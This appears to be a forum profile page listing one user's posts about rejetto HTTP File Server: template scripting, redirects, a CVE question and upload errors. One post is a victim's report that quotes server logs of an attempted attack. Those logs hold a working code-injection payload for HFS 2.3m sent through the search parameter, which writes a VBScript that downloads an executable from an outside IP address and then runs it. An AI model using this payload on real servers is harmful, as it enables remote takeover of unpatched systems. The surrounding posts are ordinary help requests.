rejetto forum

Show Posts

This section allows you to view all posts made by this member. Note that you can only see posts made in areas you currently have access to.


Topics - D

Pages: 1
1
HFS ~ HTTP File Server / decodeuri doesn't always work correctly, how can I fix?
« on: September 08, 2023, 12:45:02 PM »
I am using a script for displaying folder previews
Code: [Select]
{. if|{. exists|%item-folder%{.decodeuri|%item-url%.}.jpg .}| <img src="%item-url%.jpg" /> |  .}It doesn't work for some folders using cyrillic names. What can I do about it?

2
Bug reports / A question about HFS v2.3m vulnerability
« on: July 25, 2023, 05:00:40 AM »
https://www.cvedetails.com/cve/CVE-2020-13432/

Quote
rejetto HFS (aka HTTP File Server) v2.3m Build #300, when virtual files or folders are used, allows remote attackers to trigger an invalid-pointer write access violation via concurrent HTTP requests with a long URI or long HTTP headers.

Confidentiality Impact: None (There is no impact to the confidentiality of the system.)
Integrity Impact: None (There is no impact to the integrity of the system)
Availability Impact: Partial (There is reduced performance or interruptions in resource availability.)
Access Complexity: Low (Specialized access conditions or extenuating circumstances do not exist. Very little knowledge or skill is required to exploit. )
Authentication: Not required (Authentication is not required to exploit the vulnerability.)
If I read it correctly, this is a DoS solution that can't deal real damage, such as remote code execution?

Which HFS version is more secure (2.3m / 2.4 / 3.0)? Logically, not the beta versions, but they may have some vulnernabilities patched, I guess.

3
HFS ~ HTTP File Server / How can I set up a simple redirect?
« on: March 23, 2022, 10:36:58 AM »
www.example.com/123/321.jpg
should be redirected to
www.example.com/000/321.jpg
and same with all files in /123/

is this possible?

4
HFS ~ HTTP File Server / Request login/password but accept any
« on: December 17, 2021, 12:11:13 PM »
Is this possible? I found option "accept any login for unprotected resources" but can't get it to work.

5
Bug reports / Possible vulnerability
« on: December 11, 2021, 04:34:32 AM »
Since yesterday, someone is trying to pull code injection on me  :(  I'm on 2.3m
I'm not sure if I got hacked, I found no such files and my AV only quarantined the logs (scanned the link perhaps)
Is there a way to disable /?search functionality completely? I'm not using it anyway
Code: [Select]
10.12.2021 6:55:41 36.46.149.98 53274 Requested GET /?search= {.exec|C:\Users\Public\1.exe.}
10.12.2021 6:55:45 36.46.149.98 53556 Requested GET /?search= {.exec|C:\Users\Public\1.exe.}
10.12.2021 7:01:28 36.46.149.98 57608 Requested GET /
10.12.2021 7:01:28 36.46.149.98 57640 Requested GET /?search= {.save|C:\Users\Public\script.vbs|dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
> dim bStrm: Set bStrm = createobject("Adodb.Stream")
> xHttp.Open "GET", "http://103.144.2.108:8888/1.exe", False
> xHttp.Send
>
> with bStrm
>     .type = 1 '//binary
>     .open
>     .write xHttp.responseBody
>     .savetofile "C:\Users\Public\1.exe", 2 '//overwrite
> end with.}
Code: [Select]
10.12.2021 6:55:36 36.46.149.98 52884 Requested GET /
10.12.2021 6:55:37 36.46.149.98 52917 Requested GET /?search= {.save|C:\Users\Public\script.vbs|dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
> dim bStrm: Set bStrm = createobject("Adodb.Stream")
> xHttp.Open "GET", "http://103.144.2.108:8888/1.exe", False
> xHttp.Send
>
> with bStrm
>     .type = 1 '//binary
>     .open
>     .write xHttp.responseBody
>     .savetofile "C:\Users\Public\1.exe", 2 '//overwrite
> end with.}
Code: [Select]
11.12.2021 8:08:23 180.76.141.125 55846 Requested GET /
11.12.2021 8:08:24 180.76.141.125 55874 Requested GET /?search= {.save|C:\Users\Public\script.vbs|dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
> dim bStrm: Set bStrm = createobject("Adodb.Stream")
> xHttp.Open "GET", "http://103.144.2.108:8888/skol.exe", False
> xHttp.Send
>
> with bStrm
>     .type = 1 '//binary
>     .open
>     .write xHttp.responseBody
>     .savetofile "C:\Users\Public\skol.exe", 2 '//overwrite
> end with.}
11.12.2021 8:08:29 180.76.141.125 56070 Requested GET /?search= {.exec|C:\Users\Public\skol.exe.}
11.12.2021 8:08:32 180.76.141.125 56194 Requested GET /?search= {.exec|C:\Users\Public\skol.exe.}

6
Bug reports / False errors on upload
« on: September 16, 2021, 10:54:00 PM »
They only appear in logs. I'm using HFS 2.3m

Code: [Select]
Upload failed for 20210916_221111.jpg: Not allowed.
Upload failed 20210916_221111.jpg
Upload failed for 20210916_221155.jpg: Not allowed.
Upload failed 20210916_221155.jpg
Upload failed for 20210916_221259.jpg: Not allowed.
Upload failed 20210916_221259.jpg
Requested POST /
Uploading 20210916_221111.jpg
Fully uploaded 20210916_221111.jpg - 71.2 K @ 316.4 KB/s
Uploading 20210916_221155.jpg
Fully uploaded 20210916_221155.jpg - 114.0 K @ 797.2 KB/s
Uploading 20210916_221259.jpg
Fully uploaded 20210916_221259.jpg - 163.8 K @ 1.1 MB/s

7
HTML & templates / Custom folder previews
« on: September 11, 2021, 09:36:48 PM »
Let's say I have following folders

New folder
New folder 2
New folder 3

Each contains a "p.jpg", I want to use these as folder preview.

The code for diff template I'm currently using:
Code: [Select]
[+]
<script>
var list=document.querySelectorAll("table#files>tbody>tr");
function changepic(a1)
{
  var alink=a1.querySelector("a");
  var adress=alink.getAttribute("href");
  if(adress.endsWith("/"))
  {
  adress+="p.jpg";
  var img=document.createElement("img");
  img.setAttribute("src",adress);
  img.setAttribute("onerror","this.style.display='none'");
  a1.children[3].appendChild(img);
  }
}
list.forEach(changepic);
</script>eats too much cpu if there are too many folders. Because script doesn't check if p.jpg is actually present in folder

How can I fix it? Thanks in advance.

8
HFS ~ HTTP File Server / Is there a way to add login message?
« on: May 28, 2021, 02:14:30 AM »
Like in attachment.

9
HTML & templates / How can I implement thing on image attached?
« on: March 15, 2021, 02:28:24 AM »
I need folder names to have additional link attached automatically, with part of foldername in it:

Folder "A - B C 3" [link to example.site/view-2.php?name=A]
or
Folder "A - B C 3" [link to example.site/view-2.php?name=A: B C III]

1. How can I use foldername as variable?
2. How can I edit that variable? (%20- = %3A)
3. How can I add my link through diff template?

10
HFS ~ HTTP File Server / Is there a way to add multiple rows in banlist?
« on: February 25, 2021, 05:52:28 PM »
title

Pages: 1